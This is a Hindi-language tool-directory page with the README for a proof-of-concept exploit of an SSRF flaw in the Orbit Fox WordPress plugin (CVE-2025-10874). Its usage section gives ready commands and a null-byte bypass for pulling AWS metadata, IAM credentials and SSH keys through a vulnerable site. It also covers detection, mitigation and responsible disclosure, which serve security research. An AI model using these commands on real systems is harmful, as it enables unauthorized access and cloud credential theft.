Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — CVE-2025-10874 के लिए null byte injection बाईपास के साथ SSRF का प्रदर्शन करता है | Kitploit
उपकरण/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

CVE-2025-10874 के लिए null byte injection बाईपास के साथ SSRF का प्रदर्शन करता है

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

alt text

CVE-2025-10874 - Orbit Fox SSRF प्रूफ ऑफ कॉन्सेप्ट

Orbit Fox WordPress प्लगइन में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता को प्रदर्शित करने वाला प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जिसमें नल बाइट इंजेक्शन बायपास शामिल है।

विस्तृत ब्लॉग पोस्ट: https://ryanmroth.com/articles/orbit-fox-ssrf

भेद्यता विवरण

विवरणनोट्स
CVE ID:CVE-2025-10874
प्रभावित प्लगइन:ThemeIsle द्वारा Orbit Fox
भेद्यता प्रकार:सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) (CWE-918)
CVSS स्कोर:5.5 (मध्यम)
आवश्यक विशेषाधिकार:Author+ (WordPress Author भूमिका या उच्चतर
फिक्स्ड संस्करण3.0.2+

विवरण

Orbit Fox प्लगइन की MyStock इम्पोर्ट कार्यक्षमता में एक SSRF भेद्यता है जो Author+ विशेषाधिकार वाले प्रमाणित उपयोगकर्ताओं को WordPress सर्वर से मनमाने HTTP अनुरोध करने की अनुमति देती है। यह भेद्यता handle-request-mystock-import AJAX एक्शन में मौजूद है, जो URL पैरामीटर को ठीक से मान्य और सैनिटाइज़ करने में विफल रहता है।

यह एक्सप्लॉइट URL सत्यापन को दरकिनार करने के लिए नल बाइट इंजेक्शन बायपास (%00.txt) का लाभ उठाता है, जिससे सर्वर से सुलभ आंतरिक मेटाडेटा सेवाओं, क्लाउड प्रदाता APIs और अन्य नेटवर्क संसाधनों तक पहुंच संभव होती है।

सामान्य हमले के परिदृश्य

AWS EC2 मेटाडेटा निष्कर्षण

  • इंस्टेंस होस्टनाम: http://169.254.169.254/latest/meta-data/hostname
  • IAM क्रेडेंशियल: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • SSH सार्वजनिक कुंजियाँ: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

इंस्टॉलेशन

आवश्यकताएँ

  • Python 3.7+
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

सेटअप

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# निर्भरताएँ इंस्टॉल करें (uv का उपयोग करके)
uv sync

# या pip का उपयोग करके
pip install requests urllib3

उपयोग

बुनियादी उपयोग

root@kitploit:~
# AWS इंस्टेंस होस्टनाम निकालें (डिफ़ॉल्ट लक्ष्य)
python orbit_fox_poc.py http://target.com -u author -p password123

# कस्टम SSRF लक्ष्य URL निर्दिष्ट करें
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

उन्नत उदाहरण

root@kitploit:~
# IAM भूमिका क्रेडेंशियल निकालें
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# SSH सार्वजनिक कुंजी निकालें
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# नल बाइट बायपास के बिना परीक्षण करें (पैच किए गए संस्करणों पर विफल होगा)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# समस्या निवारण के लिए डीबग आउटपुट सक्षम करें
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

कमांड-लाइन विकल्प

root@kitploit:~
positional arguments:
  target                लक्ष्य WordPress URL (जैसे, http://example.com)

required arguments:
  -u, --username        WordPress उपयोगकर्ता नाम (Author+ भूमिका आवश्यक)
  -p, --password        WordPress पासवर्ड

optional arguments:
  -h, --help            सहायता संदेश दिखाएं और बाहर निकलें
  -s, --ssrf-url        SSRF के माध्यम से अनुरोध करने के लिए URL
                        (डिफ़ॉल्ट: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         नल बाइट बायपास अक्षम करें (केवल बुनियादी SSRF परीक्षण)
  --debug               समस्या निवारण के लिए डीबग आउटपुट सक्षम करें

यह कैसे काम करता है

  1. प्रमाणीकरण: प्रदान किए गए क्रेडेंशियल का उपयोग करके WordPress में प्रमाणित होता है
  2. Nonce पुनर्प्राप्ति: WordPress एडमिन पैनल से सुरक्षा nonce निकालता है
  3. नल बाइट इंजेक्शन: सत्यापन को दरकिनार करने के लिए लक्ष्य URL में %00.txt जोड़ता है
  4. SSRF निष्पादन: handle-request-mystock-import AJAX एंडपॉइंट पर तैयार अनुरोध भेजता है
  5. सामग्री पुनर्प्राप्ति: WordPress मीडिया लाइब्रेरी से पुनर्प्राप्त सामग्री को प्राप्त और प्रदर्शित करता है

पहचान

लॉग संकेतक

  • मेटाडेटा सेवाओं (169.254.169.254) के लिए असामान्य आउटबाउंड HTTP अनुरोध
  • handle-request-mystock-import एक्शन के साथ admin-ajax.php के अनुरोध
  • आंतरिक/मेटाडेटा URLs से WordPress मीडिया लाइब्रेरी अपलोड

शमन

  • Orbit Fox को संस्करण 3.0.2 या बाद में अपडेट करें
  • WordPress सर्वर पर सख्त ईग्रेस फ़िल्टरिंग लागू करें
  • क्लाउड मेटाडेटा एंडपॉइंट्स तक पहुंच की निगरानी और प्रतिबंध करें
  • उपयोगकर्ता भूमिकाओं की समीक्षा करें और Author+ विशेषाधिकार सीमित करें

जिम्मेदार प्रकटीकरण

यह भेद्यता विक्रेता को जिम्मेदारी से प्रकट की गई थी और Orbit Fox संस्करण 3.0.2 में पैच की गई है। यह प्रूफ ऑफ कॉन्सेप्ट निम्नलिखित के लिए प्रदान किया गया है:

  • सुरक्षा अनुसंधान और परीक्षण
  • अधिकृत सिस्टम का भेद्यता मूल्यांकन
  • शैक्षिक उद्देश्य

कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। उपयोगकर्ताओं को चाहिए:

  • परीक्षण से पहले स्पष्ट लिखित अनुमति प्राप्त करें
  • केवल उन सिस्टम पर उपयोग करें जिनके स्वामी हैं या जिनके परीक्षण के लिए अधिकृत हैं
  • सभी लागू कानूनों और विनियमों का पालन करें

लेखक इस टूल के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

संदर्भ

  • मूल भेद्यता Alex Sanford – CVE-2023-2287
  • CVE विवरण: CVE-2025-10874
  • प्लगइन रिपॉजिटरी: ThemeIsle द्वारा Orbit Fox
  • AWS मेटाडेटा सेवा: इंस्टेंस मेटाडेटा सेवा

अंतिम अद्यतन: 2025-10-06

टूल डाउनलोड करें